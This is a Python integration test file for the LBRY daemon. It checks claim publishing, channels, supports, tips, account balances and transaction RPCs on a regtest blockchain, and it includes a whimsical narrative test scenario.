    self.assertEqual(txs[0]['confirmations'], 1)
    self.assertEqual(txs[0]['claim_info'][0]['balance_delta'], '-2.5')
    self.assertEqual(txs[0]['claim_info'][0]['claim_id'], claim['claim_id'])
    self.assertEqual(txs[0]['value'], '0.0')
    self.assertEqual(txs[0]['fee'], '-0.020107')
    self.assertEqual('7.479893', await self.daemon.jsonrpc_account_balance())

    await self.make_claim(amount='1.0')  # updates previous claim
    txs = await self.out(self.daemon.jsonrpc_transaction_list())
    self.assertEqual(len(txs[0]['update_info']), 1)
    self.assertEqual(txs[0]['update_info'][0]['balance_delta'], '1.5')
    self.assertEqual(txs[0]['update_info'][0]['claim_id'], claim['claim_id'])
    self.assertEqual(txs[0]['value'], '0.0')
    self.assertEqual(txs[0]['fee'], '-0.0001985')
    self.assertEqual('8.9796945', await self.daemon.jsonrpc_account_balance())

    await self.out(self.daemon.jsonrpc_claim_abandon(claim['claim_id']))
    txs = await self.out(self.daemon.jsonrpc_transaction_list())
    self.assertEqual(len(txs[0]['abandon_info']), 1)
    self.assertEqual(txs[0]['abandon_info'][0]['balance_delta'], '1.0')
    self.assertEqual(txs[0]['abandon_info'][0]['claim_id'], claim['claim_id'])
    self.assertEqual(txs[0]['value'], '0.0')
    self.assertEqual(txs[0]['fee'], '-0.000107')
    self.assertEqual('9.9795875', await self.daemon.jsonrpc_account_balance())
async def test_update_claim_holding_address(self):
    """Sending a claim to another account's address moves it between the
    accounts' claim lists.
    """
    other_account_id = (await self.daemon.jsonrpc_account_create('second account'))['id']
    other_account = self.daemon.get_account_or_error(other_account_id)
    other_address = await other_account.receiving.get_or_create_usable_address()

    self.assertEqual('10.0', await self.daemon.jsonrpc_account_balance())

    # create the initial name claim
    claim = await self.make_claim()

    self.assertEqual(len(await self.daemon.jsonrpc_claim_list_mine()), 1)
    self.assertEqual(len(await self.daemon.jsonrpc_claim_list_mine(account_id=other_account_id)), 0)
    tx = await self.daemon.jsonrpc_claim_send_to_address(
        claim['claim_id'], other_address
    )
    await self.ledger.wait(tx)
    self.assertEqual(len(await self.daemon.jsonrpc_claim_list_mine()), 0)
    self.assertEqual(len(await self.daemon.jsonrpc_claim_list_mine(account_id=other_account_id)), 1)
async def test_publishing_checks_all_accounts_for_certificate(self):
    """Publishing into a channel finds the channel certificate across all
    accounts by default, honors ``channel_account_id`` when given, and
    fails when the named account does not hold the channel.
    """
    account1_id, account1 = self.account.id, self.account
    new_account = await self.daemon.jsonrpc_account_create('second account')
    account2_id, account2 = new_account['id'], self.daemon.get_account_or_error(new_account['id'])

    spam_channel = await self.out(self.daemon.jsonrpc_channel_new('@spam', '1.0'))
    self.assertTrue(spam_channel['success'])
    await self.confirm_tx(spam_channel['tx']['txid'])

    self.assertEqual('8.989893', await self.daemon.jsonrpc_account_balance())

    result = await self.out(self.daemon.jsonrpc_wallet_send(
        '5.0', await self.daemon.jsonrpc_address_unused(account2_id)
    ))
    await self.confirm_tx(result['txid'])

    self.assertEqual('3.989769', await self.daemon.jsonrpc_account_balance())
    self.assertEqual('5.0', await self.daemon.jsonrpc_account_balance(account2_id))

    baz_channel = await self.out(self.daemon.jsonrpc_channel_new('@baz', '1.0', account2_id))
    self.assertTrue(baz_channel['success'])
    await self.confirm_tx(baz_channel['tx']['txid'])

    channels = await self.out(self.daemon.jsonrpc_channel_list(account1_id))
    self.assertEqual(len(channels), 1)
    self.assertEqual(channels[0]['name'], '@spam')
    self.assertEqual(channels, await self.out(self.daemon.jsonrpc_channel_list()))

    channels = await self.out(self.daemon.jsonrpc_channel_list(account2_id))
    self.assertEqual(len(channels), 1)
    self.assertEqual(channels[0]['name'], '@baz')

    # defaults to using all accounts to lookup channel
    with tempfile.NamedTemporaryFile() as file:
        file.write(b'hi!')
        file.flush()
        claim1 = await self.out(self.daemon.jsonrpc_publish(
            'hovercraft', '1.0', file_path=file.name, channel_name='@baz'
        ))
        self.assertTrue(claim1['success'])
        await self.confirm_tx(claim1['tx']['txid'])

    # uses only the specific accounts which contains the channel
    with tempfile.NamedTemporaryFile() as file:
        file.write(b'hi!')
        file.flush()
        claim1 = await self.out(self.daemon.jsonrpc_publish(
            'hovercraft', '1.0', file_path=file.name,
            channel_name='@baz', channel_account_id=[account2_id]
        ))
        self.assertTrue(claim1['success'])
        await self.confirm_tx(claim1['tx']['txid'])

    # fails when specifying account which does not contain channel
    with tempfile.NamedTemporaryFile() as file:
        file.write(b'hi!')
        file.flush()
        with self.assertRaisesRegex(ValueError, "Couldn't find channel with name '@baz'."):
            await self.out(self.daemon.jsonrpc_publish(
                'hovercraft', '1.0', file_path=file.name,
                channel_name='@baz', channel_account_id=[account1_id]
            ))
async def test_updating_claim_includes_claim_value_in_balance_check(self):
    """When updating a claim, the amount locked in the existing claim
    counts toward the spendable balance; bidding above that total fails.
    """
    self.assertEqual('10.0', await self.daemon.jsonrpc_account_balance())

    await self.make_claim(amount='9.0')
    self.assertEqual('0.979893', await self.daemon.jsonrpc_account_balance())

    # update the same claim
    await self.make_claim(amount='9.0')
    self.assertEqual('0.9796205', await self.daemon.jsonrpc_account_balance())

    # update the claim a second time but use even more funds
    await self.make_claim(amount='9.97')
    self.assertEqual('0.009348', await self.daemon.jsonrpc_account_balance())

    # fails when specifying more than available
    with tempfile.NamedTemporaryFile() as file:
        file.write(b'hi!')
        file.flush()
        with self.assertRaisesRegex(
            InsufficientFundsError,
            "Please lower the bid value, the maximum amount"
            " you can specify for this claim is 9.979274."
        ):
            await self.out(self.daemon.jsonrpc_publish(
                'hovercraft', '9.98', file_path=file.name
            ))
async def test_abandoning_claim_at_loss(self):
self.assertEqual('10.0', await self.daemon.jsonrpc_account_balance())
claim = await self.make_claim(amount='0.0001')
self.assertEqual('9.979793', await self.daemon.jsonrpc_account_balance())
await self.out(self.daemon.jsonrpc_claim_abandon(claim['claim_id']))
self.assertEqual('9.97968399', await self.daemon.jsonrpc_account_balance())
    async def test_abandoned_channel_with_signed_claims(self):
        """Claims signed by an abandoned (then re-created) channel carry
        invalid signatures: they resolve only outside the channel, while
        channel resolution prefers validly-signed claims and ignores
        tampered or conflicting ones."""
        channel = await self.out(self.daemon.jsonrpc_channel_new('@abc', "1.0"))
        self.assertTrue(channel['success'])
        await self.confirm_tx(channel['tx']['txid'])
        claim = await self.make_claim(amount='0.0001', name='on-channel-claim', channel_name='@abc')
        self.assertTrue(claim['success'])
        # abandon the channel certificate, then re-create @abc with a new key
        abandon = await self.out(self.daemon.jsonrpc_claim_abandon(txid=channel['tx']['txid'], nout=0, blocking=False))
        self.assertTrue(abandon['success'])
        channel = await self.out(self.daemon.jsonrpc_channel_new('@abc', "1.0"))
        self.assertTrue(channel['success'])
        await self.confirm_tx(channel['tx']['txid'])
        # The original channel doesn't exist anymore, so the signature is invalid. For invalid
        # signatures, resolution is only possible outside a channel.
        response = await self.out(self.daemon.jsonrpc_resolve(uri='lbry://@abc/on-channel-claim'))
        self.assertNotIn('claim', response['lbry://@abc/on-channel-claim'])
        response = await self.out(self.daemon.jsonrpc_resolve(uri='lbry://on-channel-claim'))
        self.assertIn('claim', response['lbry://on-channel-claim'])
        self.assertFalse(response['lbry://on-channel-claim']['claim']['signature_is_valid'])
        direct_uri = 'lbry://on-channel-claim#' + claim['claim_id']
        response = await self.out(self.daemon.jsonrpc_resolve(uri=direct_uri))
        self.assertIn('claim', response[direct_uri])
        self.assertFalse(response[direct_uri]['claim']['signature_is_valid'])
        uri = 'lbry://@abc/on-channel-claim'
        # now, claim something on this channel (it will update the invalid claim, but we save and forcefully restore)
        original_claim = await self.make_claim(amount='0.00000001', name='on-channel-claim', channel_name='@abc')
        self.assertTrue(original_claim['success'])
        # resolves normally
        response = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
        self.assertIn('claim', response[uri])
        self.assertTrue(response[uri]['claim']['signature_is_valid'])
        # tamper with it, invalidating the signature
        value = response[uri]['claim']['value'].copy()
        value['stream']['metadata']['author'] = 'some troll'
        address = response[uri]['claim']['address']
        await self.craft_claim('on-channel-claim', 1, value, address)
        # it resolves to the now only valid claim under the channel, ignoring the fake one
        response = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
        self.assertIn('claim', response[uri])
        self.assertTrue(response[uri]['claim']['signature_is_valid'])
        # ooops! claimed a valid conflict! (this happens in the wild, mostly by accident or race condition)
        await self.craft_claim('on-channel-claim', 1, response[uri]['claim']['value'], address)
        # it still resolves! but to the older claim
        response = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
        self.assertIn('claim', response[uri])
        self.assertTrue(response[uri]['claim']['signature_is_valid'])
        self.assertEqual(response[uri]['claim']['txid'], original_claim['tx']['txid'])
    async def test_claim_list_by_channel(self):
        """claim_list_by_channel returns claims ordered by height (descending)
        then claim_id (ascending), paginates correctly, and errors on a page
        past the end."""
        self.maxDiff = None
        # split funds into many small outputs so 12 cheap claims can be made quickly
        tx = await self.daemon.jsonrpc_account_fund(None, None, '0.001', outputs=100, broadcast=True)
        await self.ledger.wait(tx)
        await self.generate(1)
        await self.ledger.wait(tx)
        channel = await self.out(self.daemon.jsonrpc_channel_new('@abc', "0.0001"))
        self.assertTrue(channel['success'])
        await self.confirm_tx(channel['tx']['txid'])
        # 4 claims per block, 3 blocks. Sorted by height (descending) then claim_id (ascending).
        claims = []
        for j in range(3):
            same_height_claims = []
            # first 3 claims of the block are left unconfirmed...
            for k in range(3):
                claim = await self.make_claim(amount='0.000001', name=f'c{j}-{k}', channel_name='@abc', confirm=False)
                self.assertTrue(claim['success'])
                same_height_claims.append(claim['claim_id'])
                await self.on_transaction_dict(claim['tx'])
            # ...the 4th confirms, mining all four into the same block
            claim = await self.make_claim(amount='0.000001', name=f'c{j}-4', channel_name='@abc', confirm=True)
            self.assertTrue(claim['success'])
            same_height_claims.append(claim['claim_id'])
            # within a height, expected order is by claim_id interpreted as hex
            same_height_claims.sort(key=lambda x: int(x, 16))
            claims = same_height_claims + claims
        page = await self.out(self.daemon.jsonrpc_claim_list_by_channel(1, page_size=20, uri='@abc'))
        page_claim_ids = [item['claim_id'] for item in page['@abc']['claims_in_channel']]
        self.assertEqual(page_claim_ids, claims)
        page = await self.out(self.daemon.jsonrpc_claim_list_by_channel(1, page_size=6, uri='@abc'))
        page_claim_ids = [item['claim_id'] for item in page['@abc']['claims_in_channel']]
        self.assertEqual(page_claim_ids, claims[:6])
        # requesting a page beyond the 12 existing claims returns an error
        out_of_bounds = await self.out(self.daemon.jsonrpc_claim_list_by_channel(2, page_size=20, uri='@abc'))
        self.assertEqual(out_of_bounds['error'], 'claim 20 greater than max 12')
    async def test_regular_supports_and_tip_supports(self):
        """Tips and plain supports must be flagged correctly (is_tip True vs
        False) in the transaction history of both the sending and the
        receiving account, with matching balance deltas."""
        # account2 will be used to send tips and supports to account1
        account2_id = (await self.daemon.jsonrpc_account_create('second account'))['id']
        # send account2 5 LBC out of the 10 LBC in account1
        result = await self.out(self.daemon.jsonrpc_wallet_send(
            '5.0', await self.daemon.jsonrpc_address_unused(account2_id)
        ))
        await self.confirm_tx(result['txid'])
        # account1 and account2 balances:
        self.assertEqual('4.999876', await self.daemon.jsonrpc_account_balance())
        self.assertEqual('5.0', await self.daemon.jsonrpc_account_balance(account2_id))
        # create the claim we'll be tipping and supporting
        claim = await self.make_claim()
        # account1 and account2 balances:
        self.assertEqual('3.979769', await self.daemon.jsonrpc_account_balance())
        self.assertEqual('5.0', await self.daemon.jsonrpc_account_balance(account2_id))
        # send a tip to the claim using account2
        tip = await self.out(
            self.daemon.jsonrpc_claim_tip(claim['claim_id'], '1.0', account2_id)
        )
        await self.on_transaction_dict(tip)
        await self.generate(1)
        await self.on_transaction_dict(tip)
        # tips don't affect balance so account1 balance is same but account2 balance went down
        self.assertEqual('3.979769', await self.daemon.jsonrpc_account_balance())
        self.assertEqual('3.9998585', await self.daemon.jsonrpc_account_balance(account2_id))
        # verify that the incoming tip is marked correctly as is_tip=True in account1
        txs = await self.out(self.daemon.jsonrpc_transaction_list())
        self.assertEqual(len(txs[0]['support_info']), 1)
        self.assertEqual(txs[0]['support_info'][0]['balance_delta'], '1.0')
        self.assertEqual(txs[0]['support_info'][0]['claim_id'], claim['claim_id'])
        self.assertEqual(txs[0]['support_info'][0]['is_tip'], True)
        self.assertEqual(txs[0]['value'], '1.0')
        self.assertEqual(txs[0]['fee'], '0.0')
        # verify that the outgoing tip is marked correctly as is_tip=True in account2
        txs2 = await self.out(
            self.daemon.jsonrpc_transaction_list(account2_id)
        )
        self.assertEqual(len(txs2[0]['support_info']), 1)
        self.assertEqual(txs2[0]['support_info'][0]['balance_delta'], '-1.0')
        self.assertEqual(txs2[0]['support_info'][0]['claim_id'], claim['claim_id'])
        self.assertEqual(txs2[0]['support_info'][0]['is_tip'], True)
        self.assertEqual(txs2[0]['value'], '-1.0')
        self.assertEqual(txs2[0]['fee'], '-0.0001415')
        # send a support to the claim using account2
        support = await self.out(
            self.daemon.jsonrpc_claim_new_support('hovercraft', claim['claim_id'], '2.0', account2_id)
        )
        await self.on_transaction_dict(support)
        await self.generate(1)
        await self.on_transaction_dict(support)
        # account2 balance went down ~2
        self.assertEqual('3.979769', await self.daemon.jsonrpc_account_balance())
        self.assertEqual('1.999717', await self.daemon.jsonrpc_account_balance(account2_id))
        # verify that the outgoing support is marked correctly as is_tip=False in account2
        txs2 = await self.out(self.daemon.jsonrpc_transaction_list(account2_id))
        self.assertEqual(len(txs2[0]['support_info']), 1)
        self.assertEqual(txs2[0]['support_info'][0]['balance_delta'], '-2.0')
        self.assertEqual(txs2[0]['support_info'][0]['claim_id'], claim['claim_id'])
        self.assertEqual(txs2[0]['support_info'][0]['is_tip'], False)
        self.assertEqual(txs2[0]['value'], '0.0')
        self.assertEqual(txs2[0]['fee'], '-0.0001415')
class TransactionCommandsTestCase(CommandTestCase):
    """Tests for transaction-level RPCs: transaction_show and utxo_release."""
    async def test_transaction_show(self):
        """transaction_show finds wallet-local txs, foreign txs (mempool
        height -2, then real height once mined) and reports failure for an
        unknown txid."""
        # local tx
        result = await self.out(self.daemon.jsonrpc_wallet_send(
            '5.0', await self.daemon.jsonrpc_address_unused(self.account.id)
        ))
        await self.confirm_tx(result['txid'])
        tx = await self.daemon.jsonrpc_transaction_show(result['txid'])
        self.assertEqual(tx.id, result['txid'])
        # someone's tx
        change_address = await self.blockchain.get_raw_change_address()
        sendtxid = await self.blockchain.send_to_address(change_address, 10)
        tx = await self.daemon.jsonrpc_transaction_show(sendtxid)
        self.assertEqual(tx.id, sendtxid)
        # height -2 marks a transaction that is only in the mempool
        self.assertEqual(tx.height, -2)
        await self.generate(1)
        tx = await self.daemon.jsonrpc_transaction_show(sendtxid)
        self.assertEqual(tx.height, self.ledger.headers.height)
        # nonexistent txid: the call returns a failure dict instead of raising
        result = await self.daemon.jsonrpc_transaction_show('0'*64)
        self.assertFalse(result['success'])
    async def test_utxo_release(self):
        """UTXOs reserved on the ledger are excluded from the spendable
        balance until utxo_release frees them."""
        sendtxid = await self.blockchain.send_to_address(
            await self.account.receiving.get_or_create_usable_address(), 1
        )
        await self.confirm_tx(sendtxid)
        await self.assertBalance(self.account, '11.0')
        # reserving every UTXO drops the spendable balance to zero
        await self.ledger.reserve_outputs(await self.account.get_utxos())
        await self.assertBalance(self.account, '0.0')
        await self.daemon.jsonrpc_utxo_release()
        await self.assertBalance(self.account, '11.0')
Fix breaking integration tests after fees changed due to the content_type modification.
import sys
import json
import tempfile
import logging
from binascii import unhexlify
import twisted.internet
from twisted.internet.asyncioreactor import AsyncioSelectorReactor
from lbrynet.extras.wallet.transaction import Transaction
from lbrynet.p2p.Error import InsufficientFundsError
from lbrynet.schema.claim import ClaimDict
from torba.testcase import IntegrationTestCase
import lbrynet.schema
lbrynet.schema.BLOCKCHAIN_NAME = 'lbrycrd_regtest'
from lbrynet import conf as lbry_conf
from lbrynet.extras.daemon.Daemon import Daemon, jsonrpc_dumps_pretty
from lbrynet.extras.wallet import LbryWalletManager
from lbrynet.extras.daemon.Components import WalletComponent
from lbrynet.extras.daemon.Components import (
DHT_COMPONENT, HASH_ANNOUNCER_COMPONENT, PEER_PROTOCOL_SERVER_COMPONENT,
REFLECTOR_COMPONENT, UPNP_COMPONENT, EXCHANGE_RATE_MANAGER_COMPONENT
)
from lbrynet.extras.daemon.ComponentManager import ComponentManager
class FakeAnalytics:
    """No-op stand-in for the daemon's analytics manager.

    Reports itself as started and silently discards every event so the
    tests never touch the real analytics backend.
    """

    @property
    def is_started(self):
        """Always report the analytics manager as running."""
        return True

    def send_new_channel(self):
        """Discard the new-channel event."""

    def shutdown(self):
        """Nothing to tear down."""

    def send_claim_action(self, action):
        """Discard the claim-action event."""

    def send_credits_sent(self):
        """Discard the credits-sent event."""

    def send_server_startup(self):
        """Discard the server-startup event."""
class CommandTestCase(IntegrationTestCase):
    """Base class for daemon command tests.

    Boots a regtest wallet node, funds the default account with 10 LBC and
    starts a Daemon with all network-facing components skipped, so tests
    can call jsonrpc_* methods directly.
    """
    # seconds before the integration-test runner gives up on a test
    timeout = 180
    MANAGER = LbryWalletManager
    VERBOSITY = logging.WARN
    async def asyncSetUp(self):
        """Configure settings, fund the default account and start the Daemon."""
        await super().asyncSetUp()
        # drive twisted's reactor from the asyncio event loop used by the tests
        twisted.internet.reactor = sys.modules['twisted.internet.reactor'] = AsyncioSelectorReactor()
        logging.getLogger('lbrynet.p2p').setLevel(self.VERBOSITY)
        logging.getLogger('lbrynet.daemon').setLevel(self.VERBOSITY)
        # reset global settings and point every directory at the test node's path
        lbry_conf.settings = None
        lbry_conf.initialize_settings(
            load_conf_file=False,
            data_dir=self.wallet_node.data_path,
            wallet_dir=self.wallet_node.data_path,
            download_dir=self.wallet_node.data_path
        )
        lbry_conf.settings['use_upnp'] = False
        lbry_conf.settings['reflect_uploads'] = False
        lbry_conf.settings['blockchain_name'] = 'lbrycrd_regtest'
        lbry_conf.settings['lbryum_servers'] = [('localhost', 50001)]
        lbry_conf.settings['known_dht_nodes'] = []
        lbry_conf.settings.node_id = None
        # fund the default account with 10 LBC and let the deposit mature
        await self.account.ensure_address_gap()
        address = (await self.account.receiving.get_addresses(limit=1, only_usable=True))[0]
        sendtxid = await self.blockchain.send_to_address(address, 10)
        await self.confirm_tx(sendtxid)
        await self.generate(5)
        def wallet_maker(component_manager):
            # hand the already-running test wallet manager to the daemon instead
            # of letting the component start its own
            self.wallet_component = WalletComponent(component_manager)
            self.wallet_component.wallet_manager = self.manager
            self.wallet_component._running = True
            return self.wallet_component
        skip = [
            DHT_COMPONENT, UPNP_COMPONENT, HASH_ANNOUNCER_COMPONENT,
            PEER_PROTOCOL_SERVER_COMPONENT, REFLECTOR_COMPONENT, EXCHANGE_RATE_MANAGER_COMPONENT
        ]
        analytics_manager = FakeAnalytics()
        self.daemon = Daemon(analytics_manager, ComponentManager(
            analytics_manager=analytics_manager,
            skip_components=skip, wallet=wallet_maker
        ))
        await self.daemon.setup()
        self.daemon.wallet_manager = self.wallet_component.wallet_manager
        self.manager.old_db = self.daemon.storage
    async def asyncTearDown(self):
        """Mark the externally-managed wallet component stopped, then shut
        the daemon down."""
        await super().asyncTearDown()
        self.wallet_component._running = False
        await self.daemon.shutdown()
    async def confirm_tx(self, txid):
        """ Wait for tx to be in mempool, then generate a block, wait for tx to be in a block. """
        await self.on_transaction_id(txid)
        await self.generate(1)
        await self.on_transaction_id(txid)
    async def on_transaction_dict(self, tx):
        """Wait until the ledger has seen the transaction given as an API dict."""
        await self.ledger.wait(
            self.ledger.transaction_class(unhexlify(tx['hex']))
        )
    @staticmethod
    def get_all_addresses(tx):
        """Return every distinct input and output address of an API tx dict."""
        addresses = set()
        for txi in tx['inputs']:
            addresses.add(txi['address'])
        for txo in tx['outputs']:
            addresses.add(txo['address'])
        return list(addresses)
    async def generate(self, blocks):
        """ Ask lbrycrd to generate some blocks and wait until ledger has them. """
        await self.blockchain.generate(blocks)
        await self.ledger.on_header.where(self.blockchain.is_expected_block)
    async def out(self, awaitable):
        """ Converts Daemon API call results (dictionary)
        to JSON and then back to a dictionary. """
        return json.loads(jsonrpc_dumps_pretty(await awaitable, ledger=self.ledger))['result']
class EpicAdventuresOfChris45(CommandTestCase):
    """Narrative end-to-end scenario covering channel creation, publishing,
    updating, abandoning, sending credits, supports and tips in sequence,
    asserting exact balances after each step."""
    VERBOSITY = logging.WARN
    async def test_no_this_is_not_a_test_its_an_adventure(self):
        # Chris45 is an avid user of LBRY and this is his story. It's fact and fiction
        # and everything in between; it's also the setting of some record setting
        # integration tests.
        # Chris45 starts everyday by checking his balance.
        result = await self.daemon.jsonrpc_account_balance()
        self.assertEqual(result, '10.0')
        # "10 LBC, yippy! I can do a lot with that.", he thinks to himself,
        # enthusiastically. But he is hungry so he goes into the kitchen
        # to make himself a spamdwich.
        # While making the spamdwich he wonders... has anyone on LBRY
        # registered the @spam channel yet? "I should do that!" he
        # exclaims and goes back to his computer to do just that!
        channel = await self.out(self.daemon.jsonrpc_channel_new('@spam', "1.0"))
        self.assertTrue(channel['success'])
        await self.confirm_tx(channel['tx']['txid'])
        # Do we have it locally?
        channels = await self.out(self.daemon.jsonrpc_channel_list())
        self.assertEqual(len(channels), 1)
        self.assertEqual(channels[0]['name'], '@spam')
        # As the new channel claim travels through the intertubes and makes its
        # way into the mempool and then a block and then into the claimtrie,
        # Chris doesn't sit idly by: he checks his balance!
        result = await self.daemon.jsonrpc_account_balance()
        self.assertEqual(result, '8.989893')
        # He waits for 6 more blocks (confirmations) to make sure the balance has been settled.
        await self.generate(6)
        result = await self.daemon.jsonrpc_account_balance(confirmations=6)
        self.assertEqual(result, '8.989893')
        # And is the channel resolvable and empty?
        response = await self.out(self.daemon.jsonrpc_resolve(uri='lbry://@spam'))
        self.assertIn('lbry://@spam', response)
        self.assertIn('certificate', response['lbry://@spam'])
        # "What goes well with spam?" ponders Chris...
        # "A hovercraft with eels!" he exclaims.
        # "That's what goes great with spam!" he further confirms.
        # And so, many hours later, Chris is finished writing his epic story
        # about eels driving a hovercraft across the wetlands while eating spam
        # and decides it's time to publish it to the @spam channel.
        with tempfile.NamedTemporaryFile() as file:
            file.write(b'blah blah blah...')
            file.write(b'[insert long story about eels driving hovercraft]')
            file.write(b'yada yada yada!')
            file.write(b'the end')
            file.flush()
            claim1 = await self.out(self.daemon.jsonrpc_publish(
                'hovercraft', '1.0', file_path=file.name, channel_id=channel['claim_id']
            ))
            self.assertTrue(claim1['success'])
            await self.confirm_tx(claim1['tx']['txid'])
        # He quickly checks the unconfirmed balance to make sure everything looks
        # correct.
        result = await self.daemon.jsonrpc_account_balance()
        self.assertEqual(result, '7.969786')
        # Also checks that his new story can be found on the blockchain before
        # giving the link to all his friends.
        response = await self.out(self.daemon.jsonrpc_resolve(uri='lbry://@spam/hovercraft'))
        self.assertIn('lbry://@spam/hovercraft', response)
        self.assertIn('claim', response['lbry://@spam/hovercraft'])
        # He goes to tell everyone about it and in the meantime 5 blocks are confirmed.
        await self.generate(5)
        # When he comes back he verifies the confirmed balance.
        result = await self.daemon.jsonrpc_account_balance()
        self.assertEqual(result, '7.969786')
        # As people start reading his story they discover some typos and notify
        # Chris who explains in despair "Oh! Noooooos!" but then remembers
        # "No big deal! I can update my claim." And so he updates his claim.
        with tempfile.NamedTemporaryFile() as file:
            file.write(b'blah blah blah...')
            file.write(b'[typo fixing sounds being made]')
            file.write(b'yada yada yada!')
            file.flush()
            claim2 = await self.out(self.daemon.jsonrpc_publish(
                'hovercraft', '1.0', file_path=file.name, channel_name='@spam'
            ))
            self.assertTrue(claim2['success'])
            self.assertEqual(claim2['claim_id'], claim1['claim_id'])
            await self.confirm_tx(claim2['tx']['txid'])
        # After some soul searching Chris decides that his story needs more
        # heart and a better ending. He takes down the story and begins the rewrite.
        abandon = await self.out(self.daemon.jsonrpc_claim_abandon(claim1['claim_id'], blocking=False))
        self.assertTrue(abandon['success'])
        await self.confirm_tx(abandon['tx']['txid'])
        # And now checks that the claim doesn't resolve anymore.
        response = await self.out(self.daemon.jsonrpc_resolve(uri='lbry://@spam/hovercraft'))
        self.assertNotIn('claim', response['lbry://@spam/hovercraft'])
        # After abandoning he just waits for his LBCs to be returned to his account
        await self.generate(5)
        result = await self.daemon.jsonrpc_account_balance()
        self.assertEqual(result, '8.9693615')
        # Amidst all this Chris receives a call from his friend Ramsey
        # who says that it is of utmost urgency that Chris transfer him
        # 1 LBC to which Chris readily obliges
        ramsey_account_id = (await self.daemon.jsonrpc_account_create("Ramsey"))['id']
        ramsey_account = self.daemon.get_account_or_error(ramsey_account_id)
        ramsey_address = await self.daemon.jsonrpc_address_unused(ramsey_account_id)
        result = await self.out(self.daemon.jsonrpc_wallet_send('1.0', ramsey_address))
        self.assertIn("txid", result)
        await self.confirm_tx(result['txid'])
        # Chris then eagerly waits for 6 confirmations to check his balance and then calls Ramsey to verify whether
        # he received it or not
        await self.generate(5)
        result = await self.daemon.jsonrpc_account_balance()
        # Chris' balance was correct
        self.assertEqual(result, '7.9692375')
        # Ramsey too assured him that he had received the 1 LBC and thanks him
        result = await self.daemon.jsonrpc_account_balance(ramsey_account_id)
        self.assertEqual(result, '1.0')
        # After Chris is done with all the "helping other people" stuff he decides that it's time to
        # write a new story and publish it to lbry. All he needed was a fresh start and he came up with:
        with tempfile.NamedTemporaryFile() as file:
            file.write(b'Amazingly Original First Line')
            file.write(b'Super plot for the grand novel')
            file.write(b'Totally un-cliched ending')
            file.write(b'**Audience Gasps**')
            file.flush()
            claim3 = await self.out(self.daemon.jsonrpc_publish(
                'fresh-start', '1.0', file_path=file.name, channel_name='@spam'
            ))
            self.assertTrue(claim3['success'])
            await self.confirm_tx(claim3['tx']['txid'])
        await self.generate(5)
        # He gives the link of his story to all his friends and hopes that this is the much needed break for him
        uri = 'lbry://@spam/fresh-start'
        # And voila, and bravo and encore! His Best Friend Ramsey read the story and immediately knew this was a hit
        # Now to keep this claim winning on the lbry blockchain he immediately supports the claim
        tx = await self.out(self.daemon.jsonrpc_claim_new_support(
            'fresh-start', claim3['claim_id'], '0.2', account_id=ramsey_account_id
        ))
        await self.confirm_tx(tx['txid'])
        # And check if his support showed up
        resolve_result = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
        # It obviously did! Because, blockchain baby \O/
        self.assertEqual(resolve_result[uri]['claim']['amount'], '1.0')
        self.assertEqual(resolve_result[uri]['claim']['effective_amount'], '1.2')
        self.assertEqual(resolve_result[uri]['claim']['supports'][0]['amount'], '0.2')
        self.assertEqual(resolve_result[uri]['claim']['supports'][0]['txid'], tx['txid'])
        await self.generate(5)
        # Now he also wanted to support the original creator of the Award Winning Novel
        # So he quickly decides to send a tip to him
        tx = await self.out(
            self.daemon.jsonrpc_claim_tip(claim3['claim_id'], '0.3', account_id=ramsey_account_id))
        await self.confirm_tx(tx['txid'])
        # And again checks if it went to the just right place
        resolve_result = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
        # Which it obviously did. Because....?????
        self.assertEqual(resolve_result[uri]['claim']['supports'][1]['amount'], '0.3')
        self.assertEqual(resolve_result[uri]['claim']['supports'][1]['txid'], tx['txid'])
        await self.generate(5)
        # Seeing the ravishing success of his novel Chris adds support to his claim too
        tx = await self.out(self.daemon.jsonrpc_claim_new_support('fresh-start', claim3['claim_id'], '0.4'))
        await self.confirm_tx(tx['txid'])
        # And check if his support showed up
        resolve_result = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
        # It did!
        self.assertEqual(resolve_result[uri]['claim']['supports'][2]['amount'], '0.4')
        self.assertEqual(resolve_result[uri]['claim']['supports'][2]['txid'], tx['txid'])
        await self.generate(5)
        # Now Ramsey who is a singer by profession, is preparing for his new "gig". He has everything in place for that
        # the instruments, the theatre, the ads, everything, EXCEPT lyrics!! He panicked.. But then he remembered
        # something, so he un-panicked. He quickly calls up his best bud Chris and requests him to write hit lyrics for
        # his song, seeing as his novel had smashed all the records, he was the perfect candidate!
        # .......
        # Chris agrees.. 17 hours 43 minutes and 14 seconds later, he makes his publish
        with tempfile.NamedTemporaryFile() as file:
            file.write(b'The Whale amd The Bookmark')
            file.write(b'I know right? Totally a hit song')
            file.write(b'That\'s what goes around for songs these days anyways')
            file.flush()
            claim4 = await self.out(self.daemon.jsonrpc_publish(
                'hit-song', '1.0', file_path=file.name, channel_id=channel['claim_id']
            ))
            self.assertTrue(claim4['success'])
            await self.confirm_tx(claim4['tx']['txid'])
        await self.generate(5)
        # He sends the link to Ramsey, all happy and proud
        uri = 'lbry://@spam/hit-song'
        # But sadly Ramsey wasn't so pleased. It was hard for him to tell Chris...
        # Chris, though a bit heartbroken, abandoned the claim for now, but instantly started working on new hit lyrics
        abandon = await self.out(self.daemon.jsonrpc_claim_abandon(txid=claim4['tx']['txid'], nout=0, blocking=False))
        self.assertTrue(abandon['success'])
        await self.confirm_tx(abandon['tx']['txid'])
        # He then checks that the claim doesn't resolve anymore.
        response = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
        self.assertNotIn('claim', response[uri])
class AccountManagement(CommandTestCase):
    """Tests for the account management RPCs: list, rename/reconfigure,
    create, change default, remove and re-add from seed."""
    # Was `VERBOSE = False`, which nothing reads; the logging-level attribute
    # consumed by CommandTestCase.asyncSetUp is VERBOSITY, as in the sibling
    # test classes.
    VERBOSITY = logging.WARN
    async def test_performing_account_management_commands(self):
        """Run the full account lifecycle and verify the results of each RPC."""
        # check initial account
        response = await self.daemon.jsonrpc_account_list()
        self.assertEqual(len(response['lbc_regtest']), 1)
        # change account name and gap
        account_id = response['lbc_regtest'][0]['id']
        self.daemon.jsonrpc_account_set(
            account_id=account_id, new_name='test account',
            receiving_gap=95, receiving_max_uses=96,
            change_gap=97, change_max_uses=98
        )
